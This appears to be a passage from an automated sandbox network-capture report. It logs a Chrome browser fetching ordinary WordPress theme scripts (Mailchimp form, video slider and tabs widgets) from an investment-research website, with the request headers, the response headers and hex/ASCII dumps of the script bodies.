                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC878INData Raw: 63 62 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 2c 69 2c 73 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 69 5b 65 5d 29 7b 69 66 28 21 6e 5b 65 5d 29 7b 76 61 72 20 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 74 26 26 72 29 72 65 74 75 72 6e 20 72 28 65 2c 21 30 29 3b 69 66 28 63 29 72 65 74 75 72 6e 20 63 28 65 2c 21 30 29 3b 74 68 72 6f 77 28 74 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 29 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 3d 69 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 6e 5b 65 5d 5b 30 5d 2e 63 61 6c 6c 28 72
                                                                                                                                                                                                                                                                        Data Ascii: cbc!function o(n,i,s){function a(e,t){if(!i[e]){if(!n[e]){var r="function"==typeof require&&require;if(!t&&r)return r(e,!0);if(c)return c(e,!0);throw(t=new Error("Cannot find module '"+e+"'")).code="MODULE_NOT_FOUND",t}r=i[e]={exports:{}},n[e][0].call(r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 2e 77 69 64 74 68 2c 69 28 65 2c 6f 29 2c 74 68 69 73 2e 6c 6f 61 64 69 6e 67 49 6e 74 65 72 76 61 6c 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 74 69 63 6b 2e 62 69 6e 64 28 74 68 69 73 29 2c 35 30 30 29 29 3a 72 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 2c 72 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6d 63 34 77 70 2d 6c 6f 61 64 69 6e 67 22 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 62 75 74 74 6f 6e 2c 65 3d 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 42 75 74 74 6f 6e 2c 72 3d 74
                                                                                                                                                                                                                                                                        Data Ascii: e.style.width=window.getComputedStyle(this.button).width,i(e,o),this.loadingInterval=window.setInterval(this.tick.bind(this),500)):r.style.opacity="0.5",r.className+=" mc4wp-loading"},o.prototype.stop=function(){var t=this.button,e=this.originalButton,r=t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1020INData Raw: 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 72 2e 64 61 74 61 2e 72 65 64 69 72 65 63 74 5f 74 6f 29 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 4d 61 69 6c 63 68 69 6d 70 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 3a 20 66 61 69 6c 65 64 20 74 6f 20 70 61 72 73 65 20 72 65 73 70 6f 6e 73 65 3a 20 22 27 2e 63 6f 6e 63 61 74 28 74 2c 27 22 27 29 29 2c 69 2e 73 65 74 52 65 73 70 6f 6e 73 65 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 63 34 77 70 2d 61 6c 65 72 74 20 6d 63 34 77 70 2d 65 72 72 6f 72 22 3e 3c 70 3e 27 2e 63 6f 6e 63 61 74 28 63 2e 65 72 72 6f 72 5f 74 65 78 74 2c 22 3c 2f 70 3e 3c 2f 64 69 76 3e 22 29 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 4d 61 69 6c 43 68 69 6d 70 20
                                                                                                                                                                                                                                                                        Data Ascii: ndow.location.href=r.data.redirect_to))}catch(t){console.error('Mailchimp for WordPress: failed to parse response: "'.concat(t,'"')),i.setResponse('<div class="mc4wp-alert mc4wp-error"><p>'.concat(c.error_text,"</p></div>"))}else console.error('MailChimp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        104192.168.2.449862141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC843OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-d30"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba14a8947cac-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC878INData Raw: 64 33 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 6c 61 79 56 69 64 65 6f 41 6e 64 50 61 75 73 65 4f 74 68 65 72 73 28 65 29 7b 76 61 72 20 69 3d 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2c 74 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 66 6c 65 78 73 6c 69 64 65 72 22 29 2e 73 6c 69 64 65 73 2e 65 71 28 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 66 6c 65 78 73 6c 69 64 65 72 22 29 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2c 6f 3d 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 3b 69 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: d30function playVideoAndPauseOthers(e){var i=jQuery(e).find("[data-youtube-video-id]").find("iframe"),t=jQuery(e).data("flexslider").slides.eq(jQuery(e).data("flexslider").currentSlide),o=t.find("[data-youtube-video-id]").find("iframe");i.each(function(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 3d 3d 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 22 29 26 26 30 3d 3d 3d 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 26 26 76 6f 69 64 20 30 3d 3d 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 69 74 65 72 61 74 69 6f 6e 22 29 3f 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 6f 2e 61 74 74 72 28 22 69 64 22 29 5d 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 6f 2e 61 74 74 72 28 22 69 64 22 29 5d 2e 70 6c 61 79 56 69 64 65 6f 28 29 2c 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 69 74 65 72 61 74 69 6f 6e 22 2c 31 29 2c 65 2e 73 74 6f 70 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ===jQuery(e).data("animation")&&0===e.currentSlide&&void 0===jQuery(e).data("iteration")?window.$youtube_players[o.attr("id")]&&setTimeout(function(){window.$youtube_players[o.attr("id")].playVideo(),jQuery(e).data("iteration",1),e.stop(),setTimeout(funct
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1136INData Raw: 22 29 26 26 22 79 65 73 22 3d 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 6c 69 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 22 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 70 6c 61 79 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 70 6c 61 79 28 29 7d 29 7d 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 65 3d 6a 51 75 65 72 79 28 22 69 66 72 61 6d 65 22 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 73 72 63 22 29 2c 6f 3d 6a 51 75 65 72 79 28
                                                                                                                                                                                                                                                                        Data Ascii: ")&&"yes"===jQuery(this).parents("li").attr("data-autoplay")&&"function"==typeof jQuery(this)[0].play&&jQuery(this)[0].play()})}jQuery(document).ready(function(){var e;e=jQuery("iframe"),jQuery.each(e,function(e,i){var t=jQuery(this).attr("src"),o=jQuery(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        105192.168.2.449863141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC838OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-11ee"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147816
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba15bb45de98-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC877INData Raw: 31 31 65 65 0d 0a 76 61 72 20 24 79 6f 75 74 75 62 65 42 47 56 69 64 65 6f 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 66 62 52 6f 77 47 65 74 41 6c 6c 45 6c 65 6d 65 6e 74 73 57 69 74 68 41 74 74 72 69 62 75 74 65 28 65 29 7b 76 61 72 20 74 2c 69 2c 6f 3d 5b 5d 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 3b 66 6f 72 28 74 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 3b 74 3c 69 3b 74 2b 2b 29 61 5b 74 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 65 29 26 26 21 6a 51 75 65 72 79 28 61 5b 74 5d 29 2e 70 61 72 65 6e 74 73 28 22 2e 74 66 73 2d 73 6c 69 64 65 72 22 29 2e 6c 65 6e 67 74 68 26 26 6f 2e 70 75 73 68 28 61 5b 74 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 5f 66 62 52
                                                                                                                                                                                                                                                                        Data Ascii: 11eevar $youtubeBGVideos={};function _fbRowGetAllElementsWithAttribute(e){var t,i,o=[],a=document.getElementsByTagName("*");for(t=0,i=a.length;t<i;t++)a[t].getAttribute(e)&&!jQuery(a[t]).parents(".tfs-slider").length&&o.push(a[t]);return o}function _fbR
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 51 75 65 72 79 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 3d 22 2b 65 2e 74 61 72 67 65 74 2e 67 65 74 56 69 64 65 6f 44 61 74 61 28 29 2e 76 69 64 65 6f 5f 69 64 2b 22 5d 22 29 2e 64 61 74 61 28 22 6c 6f 6f 70 22 29 26 26 65 2e 74 61 72 67 65 74 2e 73 65 65 6b 54 6f 28 30 29 29 3a 65 2e 64 61 74 61 3d 3d 3d 59 54 2e 50 6c 61 79 65 72 53 74 61 74 65 2e 50 4c 41 59 49 4e 47 26 26 6a 51 75 65 72 79 28 65 2e 74 61 72 67 65 74 2e 67 65 74 49 66 72 61 6d 65 28 29 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 22 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 73 69 7a 65 56 69 64 65 6f 28 65 29 7b 76 61 72 20 74 2c 69 2c 6f 2c 61 2c 64 2c 6e 2c 72 2c 73 2c 75 2c 66 2c 76 2c 63 2c 6d 2c 6c 2c 70 2c 79 3d 65
                                                                                                                                                                                                                                                                        Data Ascii: Query("[data-youtube-video-id="+e.target.getVideoData().video_id+"]").data("loop")&&e.target.seekTo(0)):e.data===YT.PlayerState.PLAYING&&jQuery(e.target.getIframe()).parent().css("opacity","1")}function resizeVideo(e){var t,i,o,a,d,n,r,s,u,f,v,c,m,l,p,y=e
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 6f 6e 74 61 69 6e 65 72 2d 76 69 64 65 6f 2d 62 67 22 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 72 74 6c 22 29 3f 79 2e 66 69 6e 64 28 70 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 7b 6d 61 72 67 69 6e 52 69 67 68 74 3a 63 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 6d 2c 6d 61 72 67 69 6e 54 6f 70 3a 76 7d 29 3a 79 2e 66 69 6e 64 28 70 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 7b 6d 61 72 67 69 6e 52 69 67 68 74 3a 6d 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 63 2c 6d 61 72 67 69 6e 54 6f 70 3a 76 7d 29 2c 79 2e 66 69 6e 64 28 70 29 2e 63 73 73 28 7b 77 69 64 74 68 3a 66 2c 68 65 69 67 68 74 3a 75 2c 22 7a 2d 69 6e 64 65 78 22 3a 2d 31 7d 29 29 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73
                                                                                                                                                                                                                                                                        Data Ascii: ontainer-video-bg"),jQuery("body").hasClass("rtl")?y.find(p).parent().css({marginRight:c,marginLeft:m,marginTop:v}):y.find(p).parent().css({marginRight:m,marginLeft:c,marginTop:v}),y.find(p).css({width:f,height:u,"z-index":-1}))):setTimeout(function(){res
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC983INData Raw: 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 2c 20 5b 64 61 74 61 2d 76 69 6d 65 6f 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 69 7a 65 56 69 64 65 6f 28 74 29 7d 2c 31 30 30 29 7d 29 2c 65 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 2c 20 5b 64 61 74 61 2d 76 69 6d 65 6f 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 69 7a 65 56 69 64 65 6f 28 74 29 7d 2c 31 65 33 29 7d 29 2c 65 28 77 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: data-youtube-video-id], [data-vimeo-video-id]").each(function(){var t=e(this);setTimeout(function(){resizeVideo(t)},100)}),e("[data-youtube-video-id], [data-vimeo-video-id]").each(function(){var t=e(this);setTimeout(function(){resizeVideo(t)},1e3)}),e(win
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        106192.168.2.449864141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC624OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-tabs-widget.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1f6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147816
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba167a7242d0-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC509INData Raw: 31 66 36 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 72 65 61 64 79 20 66 75 73 69 6f 6e 2d 77 69 64 67 65 74 2d 72 65 6e 64 65 72 2d 46 75 73 69 6f 6e 5f 57 69 64 67 65 74 5f 54 61 62 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 77 69 64 67 65 74 20 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 6e 61 76 20 6c 69 20 61 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6c 69 6e 6b 22 29 3b 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 6e 61 76 22 29 2e 66 69 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: 1f6jQuery(document).on("ready fusion-widget-render-Fusion_Widget_Tabs",function(){jQuery(".fusion-tabs-widget .fusion-tabs-nav li a").on("click",function(n){var t=jQuery(this).data("link");n.preventDefault(),jQuery(this).parents(".fusion-tabs-nav").find
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        107192.168.2.449866141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC633OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-vertical-menu-widget.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-571"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147816
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba168ed74344-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
